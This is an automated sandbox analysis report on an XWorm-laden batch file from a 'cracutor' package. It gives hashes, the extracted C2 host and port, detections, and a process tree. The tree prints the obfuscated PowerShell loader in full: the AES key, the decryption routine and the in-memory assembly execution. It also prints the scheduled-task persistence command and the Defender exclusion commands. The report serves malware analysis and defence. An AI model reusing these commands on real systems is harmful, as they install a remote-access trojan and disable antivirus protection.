Analysis
-
max time kernel
25s -
max time network
49s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-05-2024 13:53
Static task
static1
Behavioral task
behavioral1
Sample
cracutor1.0/cracutor (1)/ICSharpCode.AvalonEdit.dll
Resource
win11-20240508-en
Behavioral task
behavioral2
Sample
cracutor1.0/cracutor (1)/Neptune.exe
Resource
win11-20240426-en
Behavioral task
behavioral3
Sample
cracutor1.0/cracutor (1)/RuntimeBroker.bat
Resource
win11-20240426-en
Behavioral task
behavioral4
Sample
cracutor1.0/cracutor (1)/Scripts/Infinity.js
Resource
win11-20240508-en
Behavioral task
behavioral5
Sample
cracutor1.0/cracutor (1)/cracutor.bat
Resource
win11-20240508-en
General
-
Target
cracutor1.0/cracutor (1)/RuntimeBroker.bat
-
Size
1.4MB
-
MD5
5f2ca709edfb4aab62c0d293fc078a8d
-
SHA1
e0ee77775465e261c7e0f48643c6d66af21841c2
-
SHA256
5edd619490ce715b05fa88acb9865fa2c290949483b5813f70083d4480e4bf05
-
SHA512
833edd2aadcd390eeb9e264bdcbb790fa013b3141a5e092ed4f23b819903f6fce0edd68e337dd8801bc3529b80521b2aeddf06f245a6df37d1a3b2af97d41eaf
-
SSDEEP
24576:Jo2hIxM0iKuWJzW21FPYEbTT9bLZfSRAHRtaBLmc2ZlzLMLM1XwXuV:s++iu3b15f7t4l0LMLM0uV
Malware Config
Extracted
xworm
publisher-misc.gl.at.ply.gg:58207:58207
publisher-misc.gl.at.ply.gg:58207
-
Install_directory
%Temp%
-
install_file
RuntimeBroker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/4252-50-0x000001E273BA0000-0x000001E273BB4000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 4252 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4252 powershell.exe 4920 powershell.exe 900 powershell.exe 916 powershell.exe 432 powershell.exe 2552 powershell.exe 2928 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Neptune.exepid process 4060 Neptune.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 3 IoCs
Processes:
Neptune.exepowershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Neptune.exe Key created \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Neptune.exe Key created \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4920 powershell.exe 4920 powershell.exe 900 powershell.exe 900 powershell.exe 4252 powershell.exe 4252 powershell.exe 916 powershell.exe 916 powershell.exe 432 powershell.exe 432 powershell.exe 2552 powershell.exe 2552 powershell.exe 2928 powershell.exe 2928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4920 powershell.exe Token: SeDebugPrivilege 900 powershell.exe Token: SeIncreaseQuotaPrivilege 900 powershell.exe Token: SeSecurityPrivilege 900 powershell.exe Token: SeTakeOwnershipPrivilege 900 powershell.exe Token: SeLoadDriverPrivilege 900 powershell.exe Token: SeSystemProfilePrivilege 900 powershell.exe Token: SeSystemtimePrivilege 900 powershell.exe Token: SeProfSingleProcessPrivilege 900 powershell.exe Token: SeIncBasePriorityPrivilege 900 powershell.exe Token: SeCreatePagefilePrivilege 900 powershell.exe Token: SeBackupPrivilege 900 powershell.exe Token: SeRestorePrivilege 900 powershell.exe Token: SeShutdownPrivilege 900 powershell.exe Token: SeDebugPrivilege 900 powershell.exe Token: SeSystemEnvironmentPrivilege 900 powershell.exe Token: SeRemoteShutdownPrivilege 900 powershell.exe Token: SeUndockPrivilege 900 powershell.exe Token: SeManageVolumePrivilege 900 powershell.exe Token: 33 900 powershell.exe Token: 34 900 powershell.exe Token: 35 900 powershell.exe Token: 36 900 powershell.exe Token: SeIncreaseQuotaPrivilege 900 powershell.exe Token: SeSecurityPrivilege 900 powershell.exe Token: SeTakeOwnershipPrivilege 900 powershell.exe Token: SeLoadDriverPrivilege 900 powershell.exe Token: SeSystemProfilePrivilege 900 powershell.exe Token: SeSystemtimePrivilege 900 powershell.exe Token: SeProfSingleProcessPrivilege 900 powershell.exe Token: SeIncBasePriorityPrivilege 900 powershell.exe Token: SeCreatePagefilePrivilege 900 powershell.exe Token: SeBackupPrivilege 900 powershell.exe Token: SeRestorePrivilege 900 powershell.exe Token: SeShutdownPrivilege 900 powershell.exe Token: SeDebugPrivilege 900 powershell.exe Token: SeSystemEnvironmentPrivilege 900 powershell.exe Token: SeRemoteShutdownPrivilege 900 powershell.exe Token: SeUndockPrivilege 900 powershell.exe Token: SeManageVolumePrivilege 900 powershell.exe Token: 33 900 powershell.exe Token: 34 900 powershell.exe Token: 35 900 powershell.exe Token: 36 900 powershell.exe Token: SeIncreaseQuotaPrivilege 900 powershell.exe Token: SeSecurityPrivilege 900 powershell.exe Token: SeTakeOwnershipPrivilege 900 powershell.exe Token: SeLoadDriverPrivilege 900 powershell.exe Token: SeSystemProfilePrivilege 900 powershell.exe Token: SeSystemtimePrivilege 900 powershell.exe Token: SeProfSingleProcessPrivilege 900 powershell.exe Token: SeIncBasePriorityPrivilege 900 powershell.exe Token: SeCreatePagefilePrivilege 900 powershell.exe Token: SeBackupPrivilege 900 powershell.exe Token: SeRestorePrivilege 900 powershell.exe Token: SeShutdownPrivilege 900 powershell.exe Token: SeDebugPrivilege 900 powershell.exe Token: SeSystemEnvironmentPrivilege 900 powershell.exe Token: SeRemoteShutdownPrivilege 900 powershell.exe Token: SeUndockPrivilege 900 powershell.exe Token: SeManageVolumePrivilege 900 powershell.exe Token: 33 900 powershell.exe Token: 34 900 powershell.exe Token: 35 900 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 3408 wrote to memory of 4920 3408 cmd.exe powershell.exe PID 3408 wrote to memory of 4920 3408 cmd.exe powershell.exe PID 4920 wrote to memory of 900 4920 powershell.exe powershell.exe PID 4920 wrote to memory of 900 4920 powershell.exe powershell.exe PID 4920 wrote to memory of 956 4920 powershell.exe WScript.exe PID 4920 wrote to memory of 956 4920 powershell.exe WScript.exe PID 956 wrote to memory of 4876 956 WScript.exe cmd.exe PID 956 wrote to memory of 4876 956 WScript.exe cmd.exe PID 4876 wrote to memory of 4252 4876 cmd.exe powershell.exe PID 4876 wrote to memory of 4252 4876 cmd.exe powershell.exe PID 4252 wrote to memory of 4060 4252 powershell.exe Neptune.exe PID 4252 wrote to memory of 4060 4252 powershell.exe Neptune.exe PID 4252 wrote to memory of 4060 4252 powershell.exe Neptune.exe PID 4252 wrote to memory of 916 4252 powershell.exe powershell.exe PID 4252 wrote to memory of 916 4252 powershell.exe powershell.exe PID 4252 wrote to memory of 432 4252 powershell.exe powershell.exe PID 4252 wrote to memory of 432 4252 powershell.exe powershell.exe PID 4252 wrote to memory of 2552 4252 powershell.exe powershell.exe PID 4252 wrote to memory of 2552 4252 powershell.exe powershell.exe PID 4252 wrote to memory of 2928 4252 powershell.exe powershell.exe PID 4252 wrote to memory of 2928 4252 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_49_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_49.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_49.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_49.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_49.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_49.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"6⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5a4be454dcbec32af10161f739ec237fc
SHA144d5b3b34f92818563efeb37dc75442273cc2bf3
SHA2564436e1add60e37baccc40f44b93b8ee2baf4261b5e3e45a834ba350ec9658f15
SHA512a925de5c086cb81b50136d78dc7aea45f8205b57ae8b6219f3d00016b33ebec7e85d7630baf0c09ec2ed29a87c68f0cdefcfd21eb7e99a5679dc632cb725fc4f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57b14efd02796c1bc5dcba81d19f112fb
SHA19a0e9aa3698227387a0e8fbacffa3e35c96fd25b
SHA2561e86b2faa4cdc4dc3776bb73e33fad4df2d7f9eaae84326692491023a9efa9d0
SHA512aad2a7a509fa424bd865677361c6d8dd23ed9c13f56d9aeb1ac96828741e9a79bdddcffa7673a74693c5b3acad89c99b6602ea5fe9b1720eb85b4e26fcaaaf56
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD505b3cd21c1ec02f04caba773186ee8d0
SHA139e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59d17e8585400bc639a8b261083920ec3
SHA1aef71cce477bd67115a4e2a0a86e6b8f0f62e30a
SHA25681fa386fa9b3d185839bec826c3f8cc422e1f329792b901d61be826d42a57fc1
SHA512235c6644c1349c77f2805c400fd1091a8775b7e63a2ba2e360418faaeb8b696da13ea7bb33a2d92b35f3fafd30fa6945c2398fba7bba39cf5f037a7d900878d5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajc4drj0.dgy.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exeFilesize
2.0MB
MD503d0c69e31fd77718e661722361c0a5c
SHA104e02539771963a628477f6546be48d2d912a612
SHA256255834540df95d84167a197acc6e70d9b80baa5dc15ddb16060508be498f1e78
SHA51294ed7ee2ad72a4b80fc9121483c5b95ad2a1036b3a20f60499d59cc1255635bcade467952b828a3b27415ddd799c8b3a89476bc0f34726292f6632249fa0d986
-
C:\Users\Admin\AppData\Roaming\startup_str_49.batFilesize
1.4MB
MD55f2ca709edfb4aab62c0d293fc078a8d
SHA1e0ee77775465e261c7e0f48643c6d66af21841c2
SHA2565edd619490ce715b05fa88acb9865fa2c290949483b5813f70083d4480e4bf05
SHA512833edd2aadcd390eeb9e264bdcbb790fa013b3141a5e092ed4f23b819903f6fce0edd68e337dd8801bc3529b80521b2aeddf06f245a6df37d1a3b2af97d41eaf
-
C:\Users\Admin\AppData\Roaming\startup_str_49.vbsFilesize
114B
MD5d9eec9b625bce13dc72853f75972c180
SHA1e50f6f8df60dbd362d571d0766672aa2cfbe95b7
SHA25606574d1a4b1637a1c4c185684f0b87fd0e4d0a14783257fd900ce65b17661e07
SHA512b8a77b2d17ddbb1f614c4dd021993e75dc7c9026f9001ae3cd67a2bba0340281492d22ff2b52b96ca98f244027e7782255b9f8dfb7c38b0ac716df92c3380445
-
memory/900-16-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB
-
memory/900-25-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB
-
memory/900-26-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB
-
memory/900-27-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB
-
memory/900-30-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB
-
memory/4060-63-0x0000000005110000-0x00000000051AE000-memory.dmpFilesize
632KB
-
memory/4060-65-0x0000000005560000-0x0000000005568000-memory.dmpFilesize
32KB
-
memory/4060-66-0x00000000055B0000-0x00000000055E8000-memory.dmpFilesize
224KB
-
memory/4060-67-0x0000000005580000-0x000000000558E000-memory.dmpFilesize
56KB
-
memory/4060-64-0x0000000005BD0000-0x0000000005C62000-memory.dmpFilesize
584KB
-
memory/4060-61-0x00000000001A0000-0x000000000039E000-memory.dmpFilesize
2.0MB
-
memory/4060-62-0x0000000005620000-0x0000000005BC6000-memory.dmpFilesize
5.6MB
-
memory/4252-50-0x000001E273BA0000-0x000001E273BB4000-memory.dmpFilesize
80KB
-
memory/4920-0-0x00007FFD77043000-0x00007FFD77045000-memory.dmpFilesize
8KB
-
memory/4920-12-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB
-
memory/4920-14-0x000002AD64540000-0x000002AD6474A000-memory.dmpFilesize
2.0MB
-
memory/4920-13-0x000002AD44050000-0x000002AD44058000-memory.dmpFilesize
32KB
-
memory/4920-11-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB
-
memory/4920-10-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB
-
memory/4920-9-0x000002AD44060000-0x000002AD44082000-memory.dmpFilesize
136KB
-
memory/4920-111-0x00007FFD77043000-0x00007FFD77045000-memory.dmpFilesize
8KB
-
memory/4920-112-0x00007FFD77040000-0x00007FFD77B02000-memory.dmpFilesize
10.8MB